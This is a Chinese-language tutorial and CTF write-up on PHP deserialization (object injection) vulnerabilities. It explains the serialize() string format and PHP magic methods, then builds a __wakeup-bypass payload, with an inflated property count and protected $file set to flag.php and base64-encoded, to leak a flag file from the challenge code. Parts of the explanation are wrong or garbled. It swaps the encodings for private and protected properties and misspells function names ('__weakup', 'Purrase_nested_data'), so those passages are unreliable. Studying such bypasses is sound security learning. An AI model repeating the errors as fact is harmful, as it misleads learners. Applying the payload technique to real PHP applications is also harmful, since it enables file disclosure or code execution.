反序列化漏洞（PHP）反序列化漏洞（PHP）

介绍序列化和反序列化
序列化和反序列化：大型网站中类创建的对象多的时候会占用大量空间，序列化就是将这些对象转换为字符串来保存，当用到的时候再转换为对象，由字符串重新转换为对象的时候用到的就是反序列化。
例：

$a = new A();
$se_a = serialize($a);
echo $se_a;
?>

输出结果：

O:1:"A":1:{s:1:"a"; i:1; }

格式说明：O：“类的名字的字节数“：“类的名字“：“对象中几个参数“：{“第一个参数名字的类型“：“第一个参数名字所占字节数”：“第一个参数名字”；“第二个参数名字的类型“：“第二个参数名字所占字节数”：“第二个参数名字”；········；“第n个参数名字的类型“：“第n个参数名字所占字节数”：“第n个参数名字”；}
以下以类的名字为“A”，参数名字为a举例子：
若参数类型为public，则参数名字的类型用字母 “s”表示，整体表示为：(s:1:"a"; )；
若参数类型为private，则参数名字的类型用字母“s”表示，整体表示为：(s:4:"\0*\0a"; )；
若参数类型为protected，则参数名字的类型用字母“S”表示，整体表示为：(S:2:"\0Aa\0"; )，参数前面加类的名字。（\0是表示0的ASCII码）
常见的表示类型的字符：
O：类
a：数组（array）
b：boolean
i：整型
s：字符串
N：NULL
d：double，浮点型

挖掘反序列化漏洞需要注意的常用魔法函数反序列化漏洞也被成为对象注入。
__construct()：当一个对象创建时被调用。
__destruct()：当一个对象销毁时或者php代码执行完毕时被调用。
__toString()：当一个对象被当作一个字符串使用
__sleep()：在对象在被序列化之前运行
__wakeup()：将在序列化之后立即被调用
__weakup()函数绕过方法：
用上面的例子，正常输出O:1:"A":1:{s:1:"a"; i:1; }，这里变量数量只有一个，若改成变量数量为两个则可以绕过__weakup函数。
O:1:"A":2:{s:1:"a"; i:1; }
原因是php底层代码bug：简单来说，如果对象属性检查异常，那么Purrase_nested_data（）将会返回0，且不调用WAKEUP（）方法，但是在这之前对象和它的属性已经被创建，紧接着对象将被破坏，从而执行DESTRUCT（）函数，于是导致了漏洞。

文章图片
实战一道CTF题

class SoFun{
protected $file='index.php';
function __destruct(){//定义析构函数，当创建的对象被销毁时自动执行
if(!empty($this->file)) {
if(strchr($this-> file,"\\")===false &&strchr($this->file, '/')===false)
show_source(dirname (__FILE__).'/'.$this ->file);
elsedie('Wrong filename.');
}}
function __wakeup(){ $this-> file='index.php'; }
public function __toString(){return '' ; }}
if (!isset($_GET['file'])){ show_source('index.php'); }
else{
$file=base64_decode( $_GET['file']);
echo unserialize($file ); }
?>#

这题最后输出答案的语句应该是析构函数里的这句：show_source(dirname (__FILE__).'/'.$this ->file);
可是代码最后执行反序列化的时候执行了__weakup()函数，所以就执行了__weakup()函数中的this->file='index'，代码执行结束的时候，析构函数中show_source(dirname (__FILE__).'/'.$this ->file); 就输出的为index..php的代码了。所以用绕过__weakup()函数的方法来不让this->file这个变量变成index.php。
1、代码审计
审计代码，可以发现要得到KEY，思路如下：
1、源码最后提示，KEY在flag.php里面；
2、注意到__destruct魔术方法中，有这么一段代码，将file文件内容显示出来
show_source(dirname(FILE).’/‘.$this->file)，这个是解题关键；
3、若POST“file”参数为序列化对象，且将file设为flag.php；那么可以通过unserialize反序列化，进而调用__destruct魔术方法来显示flag.php源码（要注意的是file参数内容需要经过base64编码）；
4、上面的分析是多么美好，但从代码分析可以知道，还有__wakeup这个拦路虎，通过unserialize反序列化之后，也会调用__wakeup方法，它会把file设为index.php；
5、总结下来就是，想办法把file设为flag.php，调用__destruct方法，且绕过__wakeup。
2、PHP反序列化对象注入漏洞
上网查资料，发现原来这个CTF题目是根据PHP反序列化对象注入漏洞改编的。
简单来说，当序列化字符串中，表示对象属性个数的值大于实际属性个数时，那么就会跳过wakeup方法的执行。举个栗子，比如有个Student类，里面有个参数为name。
实际情况：O:7:”Student”:1:{S:4:”name”; s:8:”zhangsan”; }
Payload：O:7:”Student”:2:{S:4:”name”; s:8:”zhangsan”; }Payload对象属性个数为2，而实际属性个数为1，那么就会掉入漏洞，从而跳过wakeup()方法。
3、CTF Payload
明确了这些之后，就可以构造出Payload了，需反序列化的对象为：
O:5:”SoFun”:2:{S:7:”\00*\00file”; s:8:”flag.php”; }
O:5:”SoFun” 指的是类：5个字符：SoFun
:2:指的是有两个对象
S:7:”\00*\00file”指的是有个属性，有7个字符，名为\00*\00file
s:8:”flag.php”指的是属性值，有8个字符，值为flag.php
【反序列化漏洞（PHP）】值得注意的是，file是protected属性，因此需要用\00*\00来表示，\00代表ascii为0的值。另外，还需要经过Base64编码，结果为：
Tzo1OiJTb0Z1biI6Mjp7Uzo3OiJcMDAqXDAwZmlsZSI7czo4OiJmbGFnLnBocCI7fQ==